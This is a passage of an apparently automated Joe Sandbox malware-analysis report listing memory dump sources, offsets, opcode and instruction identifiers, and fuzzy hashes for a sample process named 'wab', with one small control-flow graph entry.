                                              • Opcode Fuzzy Hash: 48f661b86fd770b075732da395886f737309700eb053da4908a32023d5338128
                                              • Instruction Fuzzy Hash: 8651A075E002148FDB15CF69C4807AEBBF1FF89324F55852AD90AEB360C735A945CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1972 47f950-47f953 1973 47f955-47f958 1972->1973 1974 47f965-47f968 1973->1974 1975 47f95a 1973->1975 1976 47f975-47f977 1974->1976 1977 47f96a-47f970 LdrInitializeThunk 1974->1977 1980 47f960 1975->1980 1978 47f97e-47f981 1976->1978 1979 47f979 1976->1979 1977->1976 1978->1973 1981 47f983-47f989 1978->1981 1979->1978 1980->1974
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127055116754.0000000000470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_470000_wab.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 5264af0657ca526c4ca1ab6ebbf0ab3d6cc34d58d239fdf9ed0b986feb500d7b
                                              • Instruction ID: a59b1238b1ef86c140736727d5cc2f9a459ee0121f10883e6e0b3c8948077294
                                              • Opcode Fuzzy Hash: 5264af0657ca526c4ca1ab6ebbf0ab3d6cc34d58d239fdf9ed0b986feb500d7b
                                              • Instruction Fuzzy Hash: 5DD0A7F0604246B7EF3055B8C4483AB334CD35A310F508437FA4ED3341E729DC498526
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96b3959216f348d8c2baccd3f756efdae1033dce9b26c417fe474f7322176038
                                              • Instruction ID: 8954a7355369b8fbbacebfa666d05ca9d83b76101835964ad108413eb78135fd
                                              • Opcode Fuzzy Hash: 96b3959216f348d8c2baccd3f756efdae1033dce9b26c417fe474f7322176038
                                              • Instruction Fuzzy Hash: 23926A34A00204CFEB54DF68C584A5DB7F2EF49359F5994AAD44AAB361DB35EC82CF80
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4295c73f6daf7b8aed51b4867b575e8469a49ef9b73b1f1b240dc2fe46c4a2b9
                                              • Instruction ID: b7a1b198367c3bdffbebe7acf3ff692ea47d8ff0bf25ab361160c6523d59a90f
                                              • Opcode Fuzzy Hash: 4295c73f6daf7b8aed51b4867b575e8469a49ef9b73b1f1b240dc2fe46c4a2b9
                                              • Instruction Fuzzy Hash: DBA16B34A00204DFD714DF68C594A5EB7F3EF88359F589469E40AAB3A0DB35ED46CB90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b8546c77e61c02a59a089d480a858131bff05ae032fa770354d9104ea382a66
                                              • Instruction ID: 2ba65ce4dd0d90ded92f6ad4df06f7464b343f538af382e63a2b9b00cb24ae53
                                              • Opcode Fuzzy Hash: 1b8546c77e61c02a59a089d480a858131bff05ae032fa770354d9104ea382a66
                                              • Instruction Fuzzy Hash: 1AA18F34E00219CFEB54CF68C890B8DBBB1FF89304F248599D549AB255DB75AA86CF90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe35e7263d8817dc1f134d206685833425d6505e1c995c30933b8e4397359ab2
                                              • Instruction ID: 40482dabffd37153a181f9d35e4b9bc29f62c2e7a477afb14367952f43e6f41a
                                              • Opcode Fuzzy Hash: fe35e7263d8817dc1f134d206685833425d6505e1c995c30933b8e4397359ab2
                                              • Instruction Fuzzy Hash: 0B814B34B012498BDB48DFB8C4547AEB7B3EF88304F548529D40AEB7A4EA75DC468B91
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8ca61bc6986feecd727f861901558463caed6e490d80a7d4f54a645b2d486ce1
                                              • Instruction ID: ae1837b9e483560e2a3644104ba7a472dbb4075547dd45adf28248f1f0a24b9b
                                              • Opcode Fuzzy Hash: 8ca61bc6986feecd727f861901558463caed6e490d80a7d4f54a645b2d486ce1
                                              • Instruction Fuzzy Hash: E5915C34E0021ACBEB54DF68C890B8DB7B1FF89304F24C699D549AB354DB75AA85CF90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4104b08b5ded16c2fa8778f2590dd64c83e81df9b8e159dac4be8e2bf5ebec16
                                              • Instruction ID: fea0cc85ff1e96e888057d36bdd4fddf03a934a44ecb50451716d0db44f7416a
                                              • Opcode Fuzzy Hash: 4104b08b5ded16c2fa8778f2590dd64c83e81df9b8e159dac4be8e2bf5ebec16
                                              • Instruction Fuzzy Hash: FA619030F002199BEB19DBB5C8506EEBBB2AFC8700F54812AD406BB391DF34A946C7D4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15d83e9f17732637023a876372eec82e7db0346dacebdec4a8a3160b534bdb18
                                              • Instruction ID: e067bc4f5bbc57430d65b767fea0e20af3d1ca1bad9152dd7ae8a429d11b3c74
                                              • Opcode Fuzzy Hash: 15d83e9f17732637023a876372eec82e7db0346dacebdec4a8a3160b534bdb18
                                              • Instruction Fuzzy Hash: 4161A070A002189FEB549FA5C8547AEBBF6FF8C304F20846AE105EB3A5DE754C45CB94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46cfb8f636e79cf5c4f94d0fafe92754410df4c0bd01d1eb75c512d8e85cd94b
                                              • Instruction ID: 6f0adda82c4e401209d8516f6d2f9b46b7d1e622bfee77f06154e103724f718d
                                              • Opcode Fuzzy Hash: 46cfb8f636e79cf5c4f94d0fafe92754410df4c0bd01d1eb75c512d8e85cd94b
                                              • Instruction Fuzzy Hash: CB51C574B012089FEB549FA9C85479EBBF6FF88344F24853AE105EB7A5CA758C05CB90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0938376855e1e1cd0c88a4ee0a9f7d051e8cb7b521a37a40928f65b073946737
                                              • Instruction ID: 31ec94f560a7eb227b34503b496746d38b714975a06d5e1fbec134553389f6d2
                                              • Opcode Fuzzy Hash: 0938376855e1e1cd0c88a4ee0a9f7d051e8cb7b521a37a40928f65b073946737
                                              • Instruction Fuzzy Hash: C0519F74B001469FDB54EB74C8A07AEB7F3FF88244F51846AD40AEB354EA31DC428BA0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 93b606014feda7ceef30d5c825bbac4d765706616fa8048804528495d1af08f5
                                              • Instruction ID: f7aa11b9657c0a3e1c4e7a90479c97556430f0598e3f4b4920e7e7031e4f1fe4
                                              • Opcode Fuzzy Hash: 93b606014feda7ceef30d5c825bbac4d765706616fa8048804528495d1af08f5
                                              • Instruction Fuzzy Hash: 5C41A135E006058FEB61CFA9C8807DFF7F2FB86314F24492AD155D7661D731A8458B91
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 075f85006fc93a1a696c103f1397634a12b1c6c4810ac7a4abd0bbf21e0d8bd5
                                              • Instruction ID: bd12cde691250c55da887d915f34e15bcc41eab2203574d76a2b83324534a9d7
                                              • Opcode Fuzzy Hash: 075f85006fc93a1a696c103f1397634a12b1c6c4810ac7a4abd0bbf21e0d8bd5
                                              • Instruction Fuzzy Hash: 2531C330B002045FEB509BADCC95B9FBAA6FFC9764F248169E125EB3D8CA759C018794
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7de35fb4c5446756a3cb8d42cc70e56c33b2f8adacdba644cd7235fe39e4f840
                                              • Instruction ID: 11da60aa26a38a0126591e78fad7570f0d4f592107e3aa93827af467272c13f2
                                              • Opcode Fuzzy Hash: 7de35fb4c5446756a3cb8d42cc70e56c33b2f8adacdba644cd7235fe39e4f840
                                              • Instruction Fuzzy Hash: CD31C074B002458FDB49AB74C95066E7BB2AF89745F18957DD402EB3A2DE35CC42CBD0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8a52a0c1cd52ec238b395dd476fd460798b9af57b1e7e3b2d9b3f2a0faa64afe
                                              • Instruction ID: 5e2030646bf9115c4e0870b5423e1f2dabd5874da21da41f1f943d0f49ccf95d
                                              • Opcode Fuzzy Hash: 8a52a0c1cd52ec238b395dd476fd460798b9af57b1e7e3b2d9b3f2a0faa64afe
                                              • Instruction Fuzzy Hash: 1031A730B002045FE7109BADCC55B9FBAE6FFC8764F248169E125E73D8CA759C018794
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcb9aa3f73c93e0b433bafc37c8291c0ee35b77bbfd7f5de8cc68dc1b481c84b
                                              • Instruction ID: 36c29ce93f124308c2730c690319c8a370d3b7a1b725538362e65c2bb1215a7b
                                              • Opcode Fuzzy Hash: fcb9aa3f73c93e0b433bafc37c8291c0ee35b77bbfd7f5de8cc68dc1b481c84b
                                              • Instruction Fuzzy Hash: 4F31BE74B002459FDB48AB75C95466E7BB3AB89B46F18952CD402EB3A1EE35CC428BD0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8a4f82698a444c770c999ea10284fb5a64c8d85dee36fec10eae6bdd65fb895
                                              • Instruction ID: 9308e58b66d1a02bc68b4abd858f63e84a8366d37d0847404b004aa1872a4c4b
                                              • Opcode Fuzzy Hash: a8a4f82698a444c770c999ea10284fb5a64c8d85dee36fec10eae6bdd65fb895
                                              • Instruction Fuzzy Hash: 1D31BC34B002018BEB199B7094147AE7BA2BF88795F64582DC402EB3A2DF38C842CB94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1b4fae89d7f791c5d55737c274e27fa9666bea4358640ef3d29b59a962c039e2
                                              • Instruction ID: 5f22749af48156f88db6dae40f7a41768f3d5a2543f5025bec591311f5e530ec
                                              • Opcode Fuzzy Hash: 1b4fae89d7f791c5d55737c274e27fa9666bea4358640ef3d29b59a962c039e2
                                              • Instruction Fuzzy Hash: AA21A034B002018BEB0D9B71D41476E7BA2BF88755F655929D402EB3A2DF39CC42CBD5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af4c752094e9af26643eefef6a9ec66b831cfbc1148765e64d34ec852018117b
                                              • Instruction ID: 9ddc91fb657647456a1c4a53cad33cad6c28f2b1c2c75c55b66c0305baead644
                                              • Opcode Fuzzy Hash: af4c752094e9af26643eefef6a9ec66b831cfbc1148765e64d34ec852018117b
                                              • Instruction Fuzzy Hash: BF218D75F112159FEB04DFB8D840BEEBBF2AB88350F148029E904E73A1DB35D8428B90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1d29489a853bc522f4897688df31ab2a608aebda33f24b34faafc94e86d310c
                                              • Instruction ID: c26ab7fe98337a44af917b5e73ec7234eeeca9fd6872cd0f31bdbfc5ecf325b5
                                              • Opcode Fuzzy Hash: f1d29489a853bc522f4897688df31ab2a608aebda33f24b34faafc94e86d310c
                                              • Instruction Fuzzy Hash: 61217A79E022159FEB04DFA9D980A9EB7F2EB48350F109029E905E7361EB75D8018B90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0535a31abd180d7678d8ae569d166415366b77e877bacda69a45997535d928d
                                              • Instruction ID: 1242f5b6d79125ed5e9c3475148186261c398c406e4bd9110c9202dc023ab555
                                              • Opcode Fuzzy Hash: e0535a31abd180d7678d8ae569d166415366b77e877bacda69a45997535d928d
                                              • Instruction Fuzzy Hash: 0F3117B5E01219DFDB00CF99D884ADEFBB4FB48314F54826AE918B7210C734A955CFA1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e4f32fe81a5e3a986ea165a552edc7a17949bab4958209375476f5b9a8884ac
                                              • Instruction ID: d2bc08356591d0ed0ab6f70d9bdf1a1dbd7758e9b53a29fcefa2f8c7204ed82e
                                              • Opcode Fuzzy Hash: 9e4f32fe81a5e3a986ea165a552edc7a17949bab4958209375476f5b9a8884ac
                                              • Instruction Fuzzy Hash: F421C234B011199FEB44CA68D46069DBBF3EB88354F189429E406EB351D730DD42CB94
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f46d1da657d015883ecabea0710b0443d05107cf184d489a08fd35185d262fee
                                              • Instruction ID: 5373f671e9888a142250d946ed4f3c5ac2cae6ce4fa4ed4f99ff4dcbe1b86c0a
                                              • Opcode Fuzzy Hash: f46d1da657d015883ecabea0710b0443d05107cf184d489a08fd35185d262fee
                                              • Instruction Fuzzy Hash: 6F11C176F001291BFB60CA5ACC80B6FA29AE7D56B8F55553AE909DB2A0D630CC4583E0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127054832410.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_44d000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 013a258b8aa0df42ec8e912c0b625251448da5385a1b5d63a80141a41e0ababc
                                              • Instruction ID: c33edd85dfea45844f969b1bce6099910583038b4bb7dfa3df0bfd3d1301c0ad
                                              • Opcode Fuzzy Hash: 013a258b8aa0df42ec8e912c0b625251448da5385a1b5d63a80141a41e0ababc
                                              • Instruction Fuzzy Hash: 3921F571A04304EFEB14CF24D8C4B16BBA1FB88318F24C56EE9494B342C77AD847CA66
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e88ab1e0a1a73d5acd08c1526ae6f906ed6e72c1ab178de8540b8f2a780fab7
                                              • Instruction ID: 681cf08994ca237f19affeac88817c53d8f7bf6d36650de14277f39ba37da75c
                                              • Opcode Fuzzy Hash: 7e88ab1e0a1a73d5acd08c1526ae6f906ed6e72c1ab178de8540b8f2a780fab7
                                              • Instruction Fuzzy Hash: CF21B5756017049FD724DF29D590A6BBBF6EF88310B04CA2DE48A8BB50DB30E845CB90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc2112f77c27c5b0d98ac3544b0acf0b0d9f41e343ac43d9c9c0f74bcec80133
                                              • Instruction ID: 05ac2c0269bce146480f8b541ac2bc24c75bc1642c4da268e74de1d1e0efe252
                                              • Opcode Fuzzy Hash: dc2112f77c27c5b0d98ac3544b0acf0b0d9f41e343ac43d9c9c0f74bcec80133
                                              • Instruction Fuzzy Hash: 0B21C071E012189BCB25DF78D8506EEFBF5EB89344F5494BED006EB215EA318941CBC0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f86d4f46c4282482652b3d6821662e9734fda0dd232cc2d86a9c7e7d5f4abdb1
                                              • Instruction ID: 2f6d9f10224bc5d22dab25cc55d3fccdd6d12bb2ace6001b4d327fc92c2b7e0f
                                              • Opcode Fuzzy Hash: f86d4f46c4282482652b3d6821662e9734fda0dd232cc2d86a9c7e7d5f4abdb1
                                              • Instruction Fuzzy Hash: 312124B5D012099FCB50CF99D884BDEFBF4FF48324F15816AE808AB210D374AA44CBA4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d69f135a747afecfeca4972e7e4079af8a902225f552135e97fd49609c061aee
                                              • Instruction ID: f52bc318a6cdf00049552b0e7b77f32b317de2d4c0ba72a7bd65a5b02893da8c
                                              • Opcode Fuzzy Hash: d69f135a747afecfeca4972e7e4079af8a902225f552135e97fd49609c061aee
                                              • Instruction Fuzzy Hash: A311A135B051298BDF5896B8C8106AFB3AAEBC8350F048539D806EB354DE75DC028BE0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 98378b9555eb9497fd8ac5353e9d487ee064e85fb6bc51888077b909aba1c7a5
                                              • Instruction ID: 9fb15793e5821b030b75abf9007e5d6ef84dd1b3626fd070eb39db2d0148df5d
                                              • Opcode Fuzzy Hash: 98378b9555eb9497fd8ac5353e9d487ee064e85fb6bc51888077b909aba1c7a5
                                              • Instruction Fuzzy Hash: 49019E347055504FE7599A6C84A076FBBEACBCA755F18883EE10AC7762E92ACC038391
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8773f0af5dd9940bcf9a32577f5456b58d873b26989ef7f54b59f21a422a9bce
                                              • Instruction ID: abb95c7e2fdeab4f41e45b4b64f595e442c04881abda3eec8590a6dafd77db70
                                              • Opcode Fuzzy Hash: 8773f0af5dd9940bcf9a32577f5456b58d873b26989ef7f54b59f21a422a9bce
                                              • Instruction Fuzzy Hash: 5F2100B1D05219AFDB00CF9AD884ADEFBB8FB48314F50812AE918B7300C374A954CBE5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8219c1cb17c1be1bb5d05944ea190e832696b2cd9837fe15e64195f65230e5d
                                              • Instruction ID: 34b701ee9e047fc0c16920397b3edc6984771438a85444868108ed206e039dbe
                                              • Opcode Fuzzy Hash: a8219c1cb17c1be1bb5d05944ea190e832696b2cd9837fe15e64195f65230e5d
                                              • Instruction Fuzzy Hash: DB218672800249DFCB00CF99C844BEEBFF4EF48320F14842AE558A7210C339A591CFA0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c6108eb4236ea7d0aa1174d984e6fe6150cf25c19d5c660ca1a43441c9689d1d
                                              • Instruction ID: a40d431ec03d85cd108fb5ba76b3803081eaf52a7a26b6d79e93d76fdc7a614c
                                              • Opcode Fuzzy Hash: c6108eb4236ea7d0aa1174d984e6fe6150cf25c19d5c660ca1a43441c9689d1d
                                              • Instruction Fuzzy Hash: 051123B6800349DFDB10CF99D844BEEBFF4EB48324F14841AE958A7210C739A950DFA5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6930a7dc57787b8a7d08fc07a9341a63f9e08521dd5707db58203c829135f9a5
                                              • Instruction ID: 34303f193570a81a5fba746b676d2df3598cc08b484f0a005c115243c7fccaf7
                                              • Opcode Fuzzy Hash: 6930a7dc57787b8a7d08fc07a9341a63f9e08521dd5707db58203c829135f9a5
                                              • Instruction Fuzzy Hash: 7701F535B042189FEB258EA4C8443EEBBB5FF84364F551479DA01F7261CA31D886C7C0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127054832410.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_44d000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e0805171a530670e9f1383d81f7b365e8c2d02a00c14a36601d6d66ec15f4596
                                              • Instruction ID: 1b772d1cd8a4c37b524659e2e01f95739e5576b5c3d512c162321b7b68e8f892
                                              • Opcode Fuzzy Hash: e0805171a530670e9f1383d81f7b365e8c2d02a00c14a36601d6d66ec15f4596
                                              • Instruction Fuzzy Hash: E611BE75904284CFDB15CF14C5C4B16BBA1FB48314F24C6AED8494B352C33AD84ACF52
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b48d2a7840b9def014cfc2d80802e0745c2e9c15e64440dbd7edeed03aba96a
                                              • Instruction ID: 79ab4a95941a3fccc8c71319eda32f2a890ea0a52300600b7f2cd42c57f3c2b8
                                              • Opcode Fuzzy Hash: 5b48d2a7840b9def014cfc2d80802e0745c2e9c15e64440dbd7edeed03aba96a
                                              • Instruction Fuzzy Hash: 3E01A9347010104BE758D96D84A0B2FB7DACBC9799F28883AE50EC77A1FD2ADC028395
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc4e538bf82dbc41e04ca357448d1f35f8fa95a2ce44ef0d0357ccf7be615597
                                              • Instruction ID: a7f104db2e1608b58c8a732b43fd0bfe182e102a46469ec72f537e9a8137c8a3
                                              • Opcode Fuzzy Hash: dc4e538bf82dbc41e04ca357448d1f35f8fa95a2ce44ef0d0357ccf7be615597
                                              • Instruction Fuzzy Hash: 1001F736B050A94BEF499AB8CD107EFB7AB9FC8700F084039D54AE7690DE65CC0687D1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 990844944d9334c01bb4faad19da3cc2661c231c0fab587b2c2cdc001dda907e
                                              • Instruction ID: 3fb65e9b64d793552d453c3be8d30ca6a27e52709f6ed94dfa233656a9b51e92
                                              • Opcode Fuzzy Hash: 990844944d9334c01bb4faad19da3cc2661c231c0fab587b2c2cdc001dda907e
                                              • Instruction Fuzzy Hash: C901B135D002499FCB218FA988816AEFFB0EF86214F1444BFC109D7161C2768952CBC0
                                              Memory Dump Source
